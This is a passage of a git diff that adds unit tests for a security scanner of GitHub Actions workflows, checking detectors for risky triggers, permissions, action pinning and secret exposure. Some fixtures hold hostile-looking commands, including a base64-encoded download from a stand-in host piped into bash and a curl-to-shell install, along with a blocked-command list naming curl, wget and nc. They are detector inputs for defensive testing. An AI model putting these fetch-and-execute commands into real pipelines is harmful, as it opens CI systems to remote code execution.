+ filePath: ".github/workflows/pr-target.yml", + textContent: `on:\n pull_request_target:\n types: [opened]\nconcurrency:\n group: secure-\${{ github.ref }}\n cancel-in-progress: true\njobs:\n review:\n runs-on: ubuntu-latest\n steps:\n - run: echo review\n`, + parsed: { + on: { + pull_request_target: { + types: ["opened"], + }, + }, + concurrency: { + group: "secure-${{ github.ref }}", + "cancel-in-progress": true, + }, + jobs: { + review: { + "runs-on": "ubuntu-latest", + steps: [{ run: "echo review" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-dangerous-triggers.test.ts b/tests/layer2/workflow-dangerous-triggers.test.ts new file mode 100644 index 0000000..5927f49 --- /dev/null +++ b/tests/layer2/workflow-dangerous-triggers.test.ts @@ -0,0 +1,76 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow dangerous triggers detector", () => { + it("flags pull_request_target trigger", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: { + pull_request_target: {}, + }, + jobs: { + test: { + steps: [{ run: "echo hi" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-dangerous-triggers")).toBe( + true, + ); + }); + + it("does not flag safe triggers", async () => { + const findings = await runStaticEngine({ + 
projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/push.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [{ run: "echo hi" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-dangerous-triggers")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-excessive-permissions.test.ts b/tests/layer2/workflow-excessive-permissions.test.ts new file mode 100644 index 0000000..02cf909 --- /dev/null +++ b/tests/layer2/workflow-excessive-permissions.test.ts @@ -0,0 +1,79 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow excessive permissions detector", () => { + it("flags write-all workflow permissions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + permissions: "write-all", + jobs: { + release: { + steps: [{ run: "echo release" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-excessive-permissions")).toBe( + true, + ); + }); + + it("does not flag restrictive permissions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: "", + 
parsed: { + on: ["push"], + permissions: "read-all", + jobs: { + release: { + permissions: { + contents: "read", + }, + steps: [{ run: "echo release" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-excessive-permissions")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-forbidden-uses.test.ts b/tests/layer2/workflow-forbidden-uses.test.ts new file mode 100644 index 0000000..9bc1d3f --- /dev/null +++ b/tests/layer2/workflow-forbidden-uses.test.ts @@ -0,0 +1,78 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowForbiddenUses } from "../../src/layer2-static/detectors/workflow-forbidden-uses"; + +describe("workflow forbidden uses detector", () => { + it("flags repository actions outside an allowlist", () => { + const findings = detectWorkflowForbiddenUses({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + config: { + allow: ["github/codeql-action/*"], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-forbidden-uses"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); + + it("flags repository actions matching a denylist and ignores local and docker uses", () => { + const findings = detectWorkflowForbiddenUses({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: docker://alpine:3.20 + - uses: ./.github/actions/local + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "docker://alpine:3.20", + }, + { + uses: "./.github/actions/local", + }, + { + uses: "actions/checkout@v4", + }, + ], + }, + 
}, + }, + config: { + deny: ["actions/*"], + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-forbidden-uses"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); +}); diff --git a/tests/layer2/workflow-github-env.test.ts b/tests/layer2/workflow-github-env.test.ts new file mode 100644 index 0000000..f4d3e18 --- /dev/null +++ b/tests/layer2/workflow-github-env.test.ts @@ -0,0 +1,54 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowGithubEnv } from "../../src/layer2-static/detectors/workflow-github-env"; + +describe("workflow github env detector", () => { + it("flags writes to GITHUB_ENV from a run step", () => { + const findings = detectWorkflowGithubEnv({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: pull_request +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: echo "TOKEN=foo" >> "$GITHUB_ENV" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [{ run: 'echo "TOKEN=foo" >> "$GITHUB_ENV"' }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-github-env"); + expect(findings[0]?.evidence).toContain("GITHUB_ENV"); + }); + + it("does not flag writes to GITHUB_OUTPUT", () => { + const findings = detectWorkflowGithubEnv({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: pull_request +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: echo "TOKEN=foo" >> "$GITHUB_OUTPUT" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [{ run: 'echo "TOKEN=foo" >> "$GITHUB_OUTPUT"' }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-hardcoded-container-credentials.test.ts b/tests/layer2/workflow-hardcoded-container-credentials.test.ts new file mode 100644 index 0000000..2a6b926 --- /dev/null +++ b/tests/layer2/workflow-hardcoded-container-credentials.test.ts @@ -0,0 +1,63 @@ +import { 
describe, expect, it } from "vitest"; +import { detectWorkflowHardcodedContainerCredentials } from "../../src/layer2-static/detectors/workflow-hardcoded-container-credentials"; + +describe("workflow hardcoded container credentials detector", () => { + it("flags container image references that embed credentials", () => { + const findings = detectWorkflowHardcodedContainerCredentials({ + filePath: ".github/workflows/deploy.yml", + textContent: `on: [push] +jobs: + deploy: + runs-on: ubuntu-latest + container: + image: ghcr.io/myuser:mypassword@ghcr.io/org/private-image:latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/myuser:mypassword@ghcr.io/org/private-image:latest", + }, + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("hardcoded-container-credentials"); + }); + + it("does not flag normal image references", () => { + const findings = detectWorkflowHardcodedContainerCredentials({ + filePath: ".github/workflows/deploy.yml", + textContent: `on: [push] +jobs: + deploy: + runs-on: ubuntu-latest + container: + image: ghcr.io/org/private-image:latest + steps: + - run: echo deploy +`, + parsed: { + on: ["push"], + jobs: { + deploy: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/org/private-image:latest", + }, + steps: [{ run: "echo deploy" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-impostor-commit.test.ts b/tests/layer2/workflow-impostor-commit.test.ts new file mode 100644 index 0000000..d03fdf8 --- /dev/null +++ b/tests/layer2/workflow-impostor-commit.test.ts @@ -0,0 +1,95 @@ +import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowImpostorCommit } from "../../src/layer2-static/detectors/workflow-impostor-commit"; + +const originalFetch = globalThis.fetch; + 
+beforeEach(() => { + vi.restoreAllMocks(); +}); + +afterEach(() => { + globalThis.fetch = originalFetch; +}); + +describe("workflow impostor commit detector", () => { + it("flags commit pins that do not exist in the referenced repository", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/commits/")) { + return new Response("not found", { status: 404 }); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowImpostorCommit({ + filePath: ".github/workflows/ci.yml", + runtimeMode: "online", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-impostor-commit"); + expect(findings[0]?.evidence).toContain("actions/checkout"); + }); + + it("does not flag commits that exist in the referenced repository", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/commits/")) { + return new Response(JSON.stringify({ sha: "c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e" }), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowImpostorCommit({ + filePath: ".github/workflows/ci.yml", + runtimeMode: "online", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: 
"actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-insecure-commands.test.ts b/tests/layer2/workflow-insecure-commands.test.ts new file mode 100644 index 0000000..c900fa7 --- /dev/null +++ b/tests/layer2/workflow-insecure-commands.test.ts @@ -0,0 +1,58 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowInsecureCommands } from "../../src/layer2-static/detectors/workflow-insecure-commands"; + +describe("workflow insecure commands detector", () => { + it("flags curl piped directly into a shell", () => { + const findings = detectWorkflowInsecureCommands({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + install: + runs-on: ubuntu-latest + steps: + - run: curl -fsSL https://example.com/install.sh | sh +`, + parsed: { + on: ["push"], + jobs: { + install: { + steps: [{ run: "curl -fsSL https://example.com/install.sh | sh" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-insecure-commands"); + expect(findings[0]?.evidence).toContain("curl -fsSL https://example.com/install.sh | sh"); + }); + + it("does not flag download and execute flows that do not pipe into a shell", () => { + const findings = detectWorkflowInsecureCommands({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + install: + runs-on: ubuntu-latest + steps: + - run: curl -fsSL https://example.com/install.sh -o install.sh + - run: sh install.sh +`, + parsed: { + on: ["push"], + jobs: { + install: { + steps: [ + { run: "curl -fsSL https://example.com/install.sh -o install.sh" }, + { run: "sh install.sh" }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-known-vuln-action.test.ts b/tests/layer2/workflow-known-vuln-action.test.ts new file mode 100644 index 0000000..ca6d56a --- 
/dev/null +++ b/tests/layer2/workflow-known-vuln-action.test.ts @@ -0,0 +1,60 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow known vulnerable action detector", () => { + it("runs only in online mode", async () => { + const commonInput = { + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml" as const, + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [{ uses: "actions/checkout@v3" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + }; + + const offline = await runStaticEngine({ + ...commonInput, + config: { + ...BASE_CONFIG, + runtimeMode: "offline", + }, + }); + + const online = await runStaticEngine({ + ...commonInput, + config: { + ...BASE_CONFIG, + runtimeMode: "online", + }, + }); + + expect(offline.some((finding) => finding.rule_id === "workflow-known-vuln-action")).toBe(false); + expect(online.some((finding) => finding.rule_id === "workflow-known-vuln-action")).toBe(true); + }); +}); diff --git a/tests/layer2/workflow-misfeature.test.ts b/tests/layer2/workflow-misfeature.test.ts new file mode 100644 index 0000000..da69fb6 --- /dev/null +++ b/tests/layer2/workflow-misfeature.test.ts @@ -0,0 +1,52 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowMisfeature } from "../../src/layer2-static/detectors/workflow-misfeature"; + +describe("workflow misfeature detector", () => { + it("flags security steps that continue on error", () => { + const findings = detectWorkflowMisfeature({ + filePath: 
".github/workflows/security.yml", + textContent: `on: [push]\njobs:\n scan:\n runs-on: ubuntu-latest\n steps:\n - name: CodeQL Analysis\n continue-on-error: true\n run: codeql database analyze\n`, + parsed: { + on: ["push"], + jobs: { + scan: { + "runs-on": "ubuntu-latest", + steps: [ + { + name: "CodeQL Analysis", + "continue-on-error": true, + run: "codeql database analyze", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-misfeature"); + }); + + it("does not flag non-security steps with continue-on-error", () => { + const findings = detectWorkflowMisfeature({ + filePath: ".github/workflows/build.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - continue-on-error: true\n run: npm run docs:preview\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [ + { + "continue-on-error": true, + run: "npm run docs:preview", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-obfuscation.test.ts b/tests/layer2/workflow-obfuscation.test.ts new file mode 100644 index 0000000..88a6753 --- /dev/null +++ b/tests/layer2/workflow-obfuscation.test.ts @@ -0,0 +1,45 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowObfuscation } from "../../src/layer2-static/detectors/workflow-obfuscation"; + +describe("workflow obfuscation detector", () => { + it("flags encoded payload execution patterns", () => { + const findings = detectWorkflowObfuscation({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - run: echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: 'echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash', + }, + ], + }, + }, + 
}, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-obfuscation"); + }); + + it("does not flag straightforward non-obfuscated commands", () => { + const findings = detectWorkflowObfuscation({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - run: npm test\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ run: "npm test" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-overprovisioned-secrets.test.ts b/tests/layer2/workflow-overprovisioned-secrets.test.ts new file mode 100644 index 0000000..e1f32b1 --- /dev/null +++ b/tests/layer2/workflow-overprovisioned-secrets.test.ts @@ -0,0 +1,72 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowOverprovisionedSecrets } from "../../src/layer2-static/detectors/workflow-overprovisioned-secrets"; + +describe("workflow overprovisioned secrets detector", () => { + it("flags serialization of the full secrets context", () => { + const findings = detectWorkflowOverprovisionedSecrets({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " SECRETS: ${{ toJSON(secrets) }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + SECRETS: "${{ toJSON(secrets) }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-overprovisioned-secrets"); + expect(findings[0]?.evidence).toContain("toJSON(secrets)"); + }); + + it("ignores explicit secret references", () => { + const findings = detectWorkflowOverprovisionedSecrets({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: 
./deploy.sh", + " env:", + " SECRET_ONE: ${{ secrets.SECRET_ONE }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + SECRET_ONE: "${{ secrets.SECRET_ONE }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-parser.test.ts b/tests/layer2/workflow-parser.test.ts new file mode 100644 index 0000000..559fef3 --- /dev/null +++ b/tests/layer2/workflow-parser.test.ts @@ -0,0 +1,46 @@ +import { describe, expect, it } from "vitest"; +import { + extractWorkflowFacts, + isGitHubWorkflowPath, +} from "../../src/layer2-static/workflow/parser"; + +describe("workflow parser", () => { + it("detects github workflow file paths", () => { + expect(isGitHubWorkflowPath(".github/workflows/ci.yml")).toBe(true); + expect(isGitHubWorkflowPath(".github/workflows/release.yaml")).toBe(true); + expect(isGitHubWorkflowPath("skills/security-review/SKILL.md")).toBe(false); + }); + + it("extracts trigger, jobs, step uses and run facts", () => { + const facts = extractWorkflowFacts({ + on: ["pull_request", "workflow_dispatch"], + permissions: "write-all", + jobs: { + test: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "actions/checkout@v4", + }, + { + run: "echo ${{ github.event.pull_request.title }}", + }, + ], + }, + }, + }); + + expect(facts).not.toBeNull(); + expect(facts?.triggers).toEqual(expect.arrayContaining(["pull_request", "workflow_dispatch"])); + expect(facts?.workflowPermissions).toBe("write-all"); + expect(facts?.jobs).toHaveLength(1); + expect(facts?.jobs[0]?.steps[0]?.uses).toBe("actions/checkout@v4"); + expect(facts?.jobs[0]?.steps[1]?.run).toContain("${{"); + }); + + it("returns null for non-workflow yaml", () => { + expect(extractWorkflowFacts({ foo: "bar" })).toBeNull(); + }); +}); diff --git a/tests/layer2/workflow-real-cases.test.ts b/tests/layer2/workflow-real-cases.test.ts new file mode 100644 index 
0000000..df2f23f --- /dev/null +++ b/tests/layer2/workflow-real-cases.test.ts @@ -0,0 +1,67 @@ +import { readFileSync } from "node:fs"; +import { resolve } from "node:path"; +import { describe, expect, it } from "vitest"; +import type { CodeGateConfig } from "../../src/config"; +import { runScanEngine } from "../../src/scan"; + +interface RealCaseEntry { + id: string; + target: string; + expected_rule: string; + source: string; +} + +function makeConfig(): CodeGateConfig { + return { + severity_threshold: "high", + auto_proceed_below_threshold: true, + output_format: "terminal", + tui: { enabled: false, colour_scheme: "default", compact_mode: false }, + tool_discovery: { preferred_agent: "claude", agent_paths: {}, skip_tools: [] }, + trusted_directories: [], + blocked_commands: ["bash", "sh", "curl", "wget", "nc", "python", "node"], + known_safe_mcp_servers: [], + known_safe_formatters: [], + known_safe_lsp_servers: [], + known_safe_hooks: [], + unicode_analysis: true, + check_ide_settings: true, + owasp_mapping: true, + trusted_api_domains: [], + rule_pack_paths: [], + allowed_rules: [], + skip_rules: [], + suppress_findings: [], + workflow_audits: { enabled: true }, + runtime_mode: "offline", + }; +} + +function loadRealCaseIndex(): RealCaseEntry[] { + const indexPath = resolve(process.cwd(), "test-fixtures/workflow-audits/real-cases/index.json"); + return JSON.parse(readFileSync(indexPath, "utf8")) as RealCaseEntry[]; +} + +describe("workflow real-case fixtures", () => { + it("detects expected findings on commit-pinned public workflow fixtures", async () => { + for (const fixture of loadRealCaseIndex()) { + const targetPath = resolve( + process.cwd(), + "test-fixtures/workflow-audits/real-cases", + fixture.target, + ); + const report = await runScanEngine({ + version: "0.7.0", + scanTarget: targetPath, + config: makeConfig(), + }); + + const ruleIds = new Set(report.findings.map((finding) => finding.rule_id)); + expect( + ruleIds.has(fixture.expected_rule), + 
`${fixture.id} should detect ${fixture.expected_rule}`, + ).toBe(true); + expect(fixture.source.startsWith("https://github.com/")).toBe(true); + } + }); +}); diff --git a/tests/layer2/workflow-ref-confusion.test.ts b/tests/layer2/workflow-ref-confusion.test.ts new file mode 100644 index 0000000..0227ba4 --- /dev/null +++ b/tests/layer2/workflow-ref-confusion.test.ts @@ -0,0 +1,70 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowRefConfusion } from "../../src/layer2-static/detectors/workflow-ref-confusion"; + +describe("workflow ref confusion detector", () => { + it("flags repository actions pinned to symbolic refs", () => { + const findings = detectWorkflowRefConfusion({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@v4", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-ref-confusion"); + expect(findings[0]?.evidence).toContain("actions/checkout@v4"); + }); + + it("does not flag hash-pinned, local, or docker uses", () => { + const findings = detectWorkflowRefConfusion({ + filePath: ".github/workflows/ci.yml", + textContent: `name: ci +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 + - uses: ./.github/actions/local + - uses: docker://alpine:3.20 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@0123456789abcdef0123456789abcdef01234567", + }, + { + uses: "./.github/actions/local", + }, + { + uses: "docker://alpine:3.20", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-ref-version-mismatch.test.ts b/tests/layer2/workflow-ref-version-mismatch.test.ts new file mode 100644 index 0000000..6b23a5a 
--- /dev/null +++ b/tests/layer2/workflow-ref-version-mismatch.test.ts @@ -0,0 +1,111 @@ +import { beforeEach, afterEach, describe, expect, it, vi } from "vitest"; +import { detectWorkflowRefVersionMismatch } from "../../src/layer2-static/detectors/workflow-ref-version-mismatch"; + +const originalFetch = globalThis.fetch; + +beforeEach(() => { + vi.restoreAllMocks(); +}); + +afterEach(() => { + globalThis.fetch = originalFetch; +}); + +describe("workflow ref version mismatch detector", () => { + it("flags hash-pinned actions whose version comment resolves to a different commit", async () => { + const fetchSpy = vi + .spyOn(globalThis, "fetch") + .mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/git/ref/tags/v3.0.0")) { + return new Response( + JSON.stringify({ + object: { + type: "commit", + sha: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + }, + }), + { status: 200, headers: { "content-type": "application/json" } }, + ); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowRefVersionMismatch({ + filePath: ".github/workflows/release.yml", + runtimeMode: "online", + textContent: `name: release +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb # v3.0.0 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + ], + }, + }, + }, + }); + + expect(fetchSpy).toHaveBeenCalled(); + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-ref-version-mismatch"); + expect(findings[0]?.evidence).toContain("v3.0.0"); + }); + + it("does not flag matching version comments", async () => { + vi.spyOn(globalThis, "fetch").mockImplementation(async (input: RequestInfo | URL) => { + const url = String(input); + if (url.includes("/git/ref/tags/v3.0.0")) { + return new Response( + 
JSON.stringify({ + object: { + type: "commit", + sha: "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + }), + { status: 200, headers: { "content-type": "application/json" } }, + ); + } + + return new Response("not found", { status: 404 }); + }); + + const findings = await detectWorkflowRefVersionMismatch({ + filePath: ".github/workflows/release.yml", + runtimeMode: "online", + textContent: `name: release +on: push +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb # v3.0.0 +`, + parsed: { + on: ["push"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-secrets-inherit.test.ts b/tests/layer2/workflow-secrets-inherit.test.ts new file mode 100644 index 0000000..cfa51a6 --- /dev/null +++ b/tests/layer2/workflow-secrets-inherit.test.ts @@ -0,0 +1,57 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretsInherit } from "../../src/layer2-static/detectors/workflow-secrets-inherit"; + +describe("workflow secrets inherit detector", () => { + it("flags reusable workflow calls that inherit all secrets", () => { + const findings = detectWorkflowSecretsInherit({ + filePath: ".github/workflows/reusable.yml", + textContent: [ + "jobs:", + " call-reusable:", + " uses: ./.github/workflows/called.yml", + " secrets: inherit", + "", + ].join("\n"), + parsed: { + on: ["workflow_dispatch"], + jobs: { + "call-reusable": { + uses: "./.github/workflows/called.yml", + secrets: "inherit", + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secrets-inherit"); + expect(findings[0]?.evidence).toContain("secrets: inherit"); + }); + + it("ignores explicit secret forwarding", () => { + const findings = detectWorkflowSecretsInherit({ + filePath: ".github/workflows/reusable.yml", + 
textContent: [ + "jobs:", + " call-reusable:", + " uses: ./.github/workflows/called.yml", + " secrets:", + " token: ${{ secrets.TOKEN }}", + "", + ].join("\n"), + parsed: { + on: ["workflow_dispatch"], + jobs: { + "call-reusable": { + uses: "./.github/workflows/called.yml", + secrets: { + token: "${{ secrets.TOKEN }}", + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-secrets-outside-env.test.ts b/tests/layer2/workflow-secrets-outside-env.test.ts new file mode 100644 index 0000000..22af5cd --- /dev/null +++ b/tests/layer2/workflow-secrets-outside-env.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSecretsOutsideEnv } from "../../src/layer2-static/detectors/workflow-secrets-outside-env"; + +describe("workflow secrets outside environment detector", () => { + it("flags secret usage in jobs without an environment", () => { + const findings = detectWorkflowSecretsOutsideEnv({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " API_KEY: ${{ secrets.API_KEY }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + steps: [ + { + run: "./deploy.sh", + env: { + API_KEY: "${{ secrets.API_KEY }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-secrets-outside-env"); + expect(findings[0]?.evidence).toContain("secrets.API_KEY"); + }); + + it("ignores jobs that declare a dedicated environment", () => { + const findings = detectWorkflowSecretsOutsideEnv({ + filePath: ".github/workflows/deploy.yml", + textContent: [ + "jobs:", + " deploy:", + " environment: production", + " runs-on: ubuntu-latest", + " steps:", + " - run: ./deploy.sh", + " env:", + " API_KEY: ${{ secrets.API_KEY }}", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + deploy: { + 
